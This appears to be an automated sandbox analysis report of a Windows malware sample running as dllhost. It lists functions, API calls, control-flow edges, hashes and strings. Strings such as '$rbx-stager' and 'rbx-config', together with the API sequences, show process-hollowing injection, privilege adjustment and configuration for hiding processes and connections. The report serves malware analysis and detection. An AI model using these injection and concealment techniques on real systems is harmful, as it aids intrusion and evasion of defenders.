                                                                                                                                                          Function 000000014000200C Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1323846700-0
                                                                                                                                                          • Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                                                                                                                                          • Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
                                                                                                                                                          • Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                                                                                                                                          • Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704
                                                                                                                                                          Function 0000000140002D38 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 204 140002d38-140002d3c call 140002d4c 206 140002d41-140002d43 ExitProcess 204->206
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
                                                                                                                                                            • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
                                                                                                                                                            • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
                                                                                                                                                            • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
                                                                                                                                                            • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
                                                                                                                                                            • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
                                                                                                                                                            • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
                                                                                                                                                            • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0000000140002D43
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3805535264-0
                                                                                                                                                          • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                                                                                                                          • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                                                                                                                                                          • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                                                                                                                          • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 0000000140003204 Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 236registrymemoryfileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 264 140003204-140003225 265 14000322b 264->265 266 14000341d-140003423 264->266 267 140003231-140003237 265->267 268 14000338b-1400033c3 GetProcessHeap HeapAlloc K32EnumProcesses 265->268 269 140003599-1400035bd ReadFile 266->269 270 140003429-14000342c 266->270 273 140003382-140003384 ExitProcess 267->273 274 14000323d-140003240 267->274 271 140003652-140003664 268->271 272 1400033c9-1400033da 268->272 269->271 275 1400035c3-1400035ca 269->275 276 140003432-140003438 270->276 277 14000358f-140003594 call 140001f7c 270->277 272->271 278 1400033e0-140003416 call 140001868 * 2 272->278 280 140003246-140003249 274->280 281 1400032ea-140003315 RegOpenKeyExW 274->281 275->271 282 1400035d0-14000360b GetProcessHeap HeapAlloc call 140001cf0 275->282 283 140003534-140003547 call 1400020fc 276->283 284 14000343e-140003441 276->284 277->271 321 140003418 278->321 289 1400032db-1400032e5 280->289 290 14000324f-140003252 280->290 286 140003353-14000337d call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 281->286 287 140003317-14000334d RegDeleteValueW * 3 281->287 307 14000360d-140003613 282->307 308 14000363e-14000364c GetProcessHeap HeapFree 282->308 283->271 310 14000354d-14000355c call 1400020fc 283->310 292 140003443-140003449 284->292 293 140003480-140003491 call 1400020fc 284->293 286->271 287->286 289->271 298 140003254-14000325a 290->298 299 1400032ce-1400032d6 290->299 292->271 301 14000344f-140003479 call 140002c5c call 140002c88 ExitProcess 292->301 293->271 312 140003497-1400034b9 ReadFile 293->312 298->271 306 140003260-140003284 ReadFile 298->306 299->271 306->271 315 14000328a-140003291 306->315 307->308 316 140003615-140003627 307->316 308->271 310->271 327 140003562-14000358a ShellExecuteW 310->327 312->271 320 1400034bf-1400034c6 312->320 315->271 323 140003297-1400032c9 call 140001868 * 2 315->323 324 140003629-14000362b 316->324 325 14000362d-140003635 316->325 320->271 328 1400034cc-14000350a GetProcessHeap HeapAlloc ReadFile 320->328 321->271 323->271 324->325 331 140003639 call 140001eec 324->331 325->316 332 140003637 325->332 327->271 328->308 334 140003510-14000351c 328->334 331->308 332->308 334->308 337 140003522-14000352f call 140002434 334->337 337->308
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
                                                                                                                                                          • String ID: $rbx-dll32$$rbx-dll64$$rbx-stager$$rbx-svc32$$rbx-svc64$SOFTWARE$open
                                                                                                                                                          • API String ID: 4225498131-1538754800
                                                                                                                                                          • Opcode ID: 736ca42babcb8c521872a82743edff672a2e6888472d9d1dca7c806dbabe5d2e
                                                                                                                                                          • Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
                                                                                                                                                          • Opcode Fuzzy Hash: 736ca42babcb8c521872a82743edff672a2e6888472d9d1dca7c806dbabe5d2e
                                                                                                                                                          • Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700
                                                                                                                                                          Function 0000000140002434 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 317injectionthreadmemoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 346 140002434-140002469 347 140002911 346->347 348 14000246f-14000247b 346->348 351 140002913-14000292d 347->351 349 140002493 348->349 350 14000247d-140002487 348->350 353 140002496-140002499 349->353 350->347 352 14000248d-140002491 350->352 352->353 354 1400024d4 353->354 355 14000249b-1400024b6 call 1400020cc 353->355 356 1400024d7-140002532 CreateProcessW 354->356 355->347 372 1400024bc-1400024c7 355->372 358 1400028d7-1400028df 356->358 359 140002538-14000254f 356->359 361 1400028e1-1400028ef OpenProcess 358->361 362 1400028fc-140002903 358->362 363 140002555-14000258f call 1400020cc VirtualAllocEx 359->363 364 140002730-140002767 call 1400020cc VirtualAllocEx 359->364 361->362 365 1400028f1-1400028f6 TerminateProcess 361->365 362->347 367 140002905-14000290c 362->367 363->358 376 140002595-1400025b1 WriteProcessMemory 363->376 364->358 377 14000276d-140002789 WriteProcessMemory 364->377 365->362 367->356 372->347 373 1400024cd 372->373 373->354 376->358 378 1400025b7-1400025dc VirtualProtectEx 376->378 377->358 379 14000278f-1400027b3 VirtualProtectEx 377->379 378->358 381 1400025e2-1400025f0 378->381 379->358 380 1400027b9-1400027c7 379->380 382 140002858-140002877 VirtualAlloc 380->382 383 1400027cd 380->383 384 140002682-1400026a1 VirtualAlloc 381->384 385 1400025f6 381->385 382->358 388 140002879-14000288f Wow64GetThreadContext 382->388 386 1400027d0-1400027f2 WriteProcessMemory 383->386 384->358 387 1400026a7-1400026be GetThreadContext 384->387 389 1400025f9-14000261b WriteProcessMemory 385->389 390 1400028d5 386->390 391 1400027f8-140002803 386->391 387->358 392 1400026c4-1400026e9 WriteProcessMemory 387->392 388->358 393 140002891-1400028b4 WriteProcessMemory 388->393 389->390 394 140002621-14000262c 389->394 390->358 395 140002805-140002809 391->395 396 14000280b 391->396 392->358 397 1400026ef-14000270c SetThreadContext 392->397 393->358 398 1400028b6-1400028ca Wow64SetThreadContext 393->398 399 140002634 394->399 400 14000262e-140002632 394->400 401 14000280f-14000283e call 140002930 VirtualProtectEx 395->401 396->401 397->358 402 140002712-140002720 ResumeThread 397->402 398->390 403 140002638-140002665 call 140002930 VirtualProtectEx 399->403 400->403 401->390 410 140002844-140002852 401->410 402->358 406 140002726-14000272b 402->406 403->390 409 14000266b-14000267c 403->409 406->351 409->384 409->389 410->382 410->386
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                                                                                                                                          • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                                                                                                                          • API String ID: 1036100660-1371749706
                                                                                                                                                          • Opcode ID: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                                                                                                                                                          • Instruction ID: 2cc4599025b35cf826ffc418a6ccceb484f0f008c335a408c33283198f0c2c0b
                                                                                                                                                          • Opcode Fuzzy Hash: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                                                                                                                                                          • Instruction Fuzzy Hash: DAD15DB6705A8187EB65CF63F84479AB7A0F788BC4F004025EB8A47BA4DF78D595CB04
                                                                                                                                                          Function 0000000140001274 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 136memoryregistrystringCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                          • String ID: d
                                                                                                                                                          • API String ID: 2005889112-2564639436
                                                                                                                                                          • Opcode ID: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                                                                                                                                                          • Instruction ID: 9172d928bd221ff1096d4d6b158f49becdf828e9a984a0b33df103b3ad9988b4
                                                                                                                                                          • Opcode Fuzzy Hash: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                                                                                                                                                          • Instruction Fuzzy Hash: 765138B2604B8086EB16DF62F4483AA77A1F79CBD9F444124EB4A07B78DF38C555C710
                                                                                                                                                          Function 000000014000151C Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                                                                                                                                          • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                          • API String ID: 3993315683-3414887735
                                                                                                                                                          • Opcode ID: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                                                                                                                                                          • Instruction ID: 0bd1eed236b6321b202bdd9012a21668a5814f2879643e8febc2c05628ee43d5
                                                                                                                                                          • Opcode Fuzzy Hash: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                                                                                                                                                          • Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744
                                                                                                                                                          Function 000000014000217C Relevance: 13.6, APIs: 9, Instructions: 100memorycomCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4184240511-0
                                                                                                                                                          • Opcode ID: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                                                                                                                                                          • Instruction ID: e7c2dfd052af18fd3abcefe0f72c8446b9113f84b0d7c840ae7e34f71e75c1d0
                                                                                                                                                          • Opcode Fuzzy Hash: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
                                                                                                                                                          • Instruction Fuzzy Hash: FF4146B2704A859AE711CF6AF8443DD63B1FB89B99F445225BF0A43A69DF38C159C304
                                                                                                                                                          Function 000000014000104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                          • String ID: d
                                                                                                                                                          • API String ID: 3743429067-2564639436
                                                                                                                                                          • Opcode ID: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                                                                                                                                          • Instruction ID: 03f89dd543fa71545bde49b2618b44e89e47b203f0d8546e2499baea92addc30
                                                                                                                                                          • Opcode Fuzzy Hash: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                                                                                                                                          • Instruction Fuzzy Hash: D1412AB2614B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                                                                                                                                          Function 00000001400017A8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Delete$CloseEnumOpen
                                                                                                                                                          • String ID: SOFTWARE\$rbx-config
                                                                                                                                                          • API String ID: 3013565938-3990243012
                                                                                                                                                          • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                                                                                                                          • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                                                                                                                                                          • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                                                                                                                                          • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
                                                                                                                                                          Function 000000014000148C Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$Free
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3168794593-0
                                                                                                                                                          • Opcode ID: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                                                                                                                                          • Instruction ID: 5a1011d9486e765d7ba40cc25435cd7167fae03bd1d0927e1cf3db12c06e0eeb
                                                                                                                                                          • Opcode Fuzzy Hash: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                                                                                                                                          • Instruction Fuzzy Hash: 2A0132B2610A808AE705EF67B80438977A0F78CFC0F4A4525FB5953B39CE38D091C744
                                                                                                                                                          Function 00000001400020CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                          • String ID: ntdll.dll
                                                                                                                                                          • API String ID: 1646373207-2227199552
                                                                                                                                                          • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                                                                                                                          • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                                                                                                                                                          • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                                                                                                                          • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                                                                                                                                                          Function 0000000140001220 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                          • Opcode ID: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                                                                                                                                          • Instruction ID: 6e91e1ae57bb2f507bdd30ccb813d710b9eda330d3ff7d449275dd8231ce62c3
                                                                                                                                                          • Opcode Fuzzy Hash: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                                                                                                                                          • Instruction Fuzzy Hash: EBE032F1B41A0086E709DB63E80838936E1EB9CB85F898024AA0907371DF7D85D98B90
                                                                                                                                                          Function 0000000140001000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005E.00000002.2240318240.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005E.00000002.2240005342.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2240816960.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005E.00000002.2241361747.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_94_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                          • Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                                                                                                                          • Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
                                                                                                                                                          • Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                                                                                                                          • Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:14.6%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:217
                                                                                                                                                          Total number of Limit Nodes:13
